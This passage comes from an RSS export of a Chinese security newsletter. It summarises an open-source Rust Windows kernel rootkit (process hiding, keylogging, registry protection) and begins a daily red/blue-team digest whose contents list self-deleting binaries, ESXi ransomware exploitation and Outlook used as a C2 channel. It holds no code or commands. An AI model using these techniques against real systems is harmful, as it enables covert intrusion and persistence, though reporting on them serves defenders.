	<img class="rich_pages wxw-img" data-ratio="0.17543859649122806" data-w="114" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=4432369e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_svg%2F98Nz5LFElxzdExAnJcAwRHYS1bUueFicTBbicTYN9sdduGI27od9NYbolOKiawX83yz05G6RkQZNl7gXdxAArSY1W2OA7jNXAYy%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.23809523809523808" data-w="84" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=d185d8e6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_svg%2F98Nz5LFElxzdExAnJcAwRHYS1bUueFicTCW4rwFNj1OZOOm6MaDUtw1l1wxyvGFNNibdtzl0K7yIYOeJSt4A68ib0ibP4ZYUtp63%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Rust 语言编写的 Windows 内核 Rootkit (shadow-rs)</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Rust 语言编写 Rootkit 的尝试</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsBDBFp6NMYSiaD16mic40WgTwBQUu4uymsUuSGAcibmncicnKPHK007FeZA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsBDBFp6NMYSiaD16mic40WgTwBQUu4uymsUuSGAcibmncicnKPHK007FeZA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855188554825242"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">教育与研究目的：项目强调其目的是教育和研究，而不是鼓励恶意使用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用 Rust 语言特性：项目选择 Rust 语言以利用其安全性和性能特性来开发内核根本套件。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">已实现的功能：项目已经实现了多项关键功能，如进程和线程的隐藏与保护、驱动程序操作、键盘记录器、注册表保护等。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">构建与安装指南：项目提供了详细的构建和安装指南，以便开发者可以在 Windows 环境中部署和测试根本套件。</section></li></ul>
	<br/>
	<p>🏷️: 网络安全, Rootkit, Windows, Rust</p></section><p><br/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img class="rich_pages wxw-img" data-ratio="1.5548387096774194" width="300" data-w="930" height="420" style="border-radius: 4px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;" src="https://wechat2rss.xlab.app/img-proxy/?k=e43c0323&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsL15spQFiaiaxUpFl8TxaoqvPnRPm7LqlTtHNa5ePJccTZyNT09P9Ig1Q%2F640%3Fwx_fmt%3Djpeg"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487701">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=b572532a&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487701%26idx%3D1%26sn%3Da13601e7051b7a0257363a12c4cf310e%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 05 Aug 2024 19:19:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」0730 | outlook C2、ESXi漏洞、红蓝工具</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487691&amp;idx=1&amp;sn=383f62eea8e5e77b27c6b320d9af61c1</link>
      <description>C#自删除代码、Cnext项目漏洞、勒索软件利用ESXi漏洞、规则探索者项目介绍、Outlook注册表C2代理及Specula框架恶意软件操作.</description>
      <content:encoded><![CDATA[<p>
<span>bggsec</span> <span>2024-07-30 08:41</span> <span style="display: inline-block;">中国香港</span>
</p>

<p>C#自删除代码、Cnext项目漏洞、勒索软件利用ESXi漏洞、规则探索者项目介绍、Outlook注册表C2代理及Specula框架恶意软件操作.</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=726ab3fb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnmMbSSOXzLLv374fC8mUZN4WHMCibtTWxZhCdcMv6X51zODCdZCicFVsa5WAB1AkG9SHmN8GfDESBA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;">
	<h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-07-30 「红蓝热点」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">「新、热、赞」</code>，帮部分人<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">阅读提效</code><br/>
			2. 学有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">精读浅读深读</code>，艺有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">会熟精绝化</code>，觉知此事<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">重躬行</code>。推送只在<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">浅读预览</code><br/>
			3. 机读为主，人工辅助，每日数万网站，10w推特速读<br/>
			4. 推送可能<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">大众或小众</code>，不代表本人偏好或认可<br/>
			5. 因渲染和外链原因，公众号<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">甲方安全建设</code>发送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">日报</code>或日期,如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">20240730</code>获取<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">图文评论版pdf</code></p></blockquote><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">目录</span></h3><blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">0x01 【2024-0729】C#自删除二进制代码实现<br/>0x02 【2024-0729】Cnext项目中的CosmicSting漏洞利用分析<br/>0x03 【2024-0730】勒索软件操作者利用ESXi虚拟机管理程序漏洞进行大规模加密<br/>0x04 【2024-0730】规则探索者项目REx介绍<br/>0x05 【2024-0730】利用注册表将Outlook变为C2代理<br/>0x06 【2024-0730】Specula框架：在Outlook环境下利用VBScript进行恶意软件操作<br/></p></blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 C#自删除二进制代码实现</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
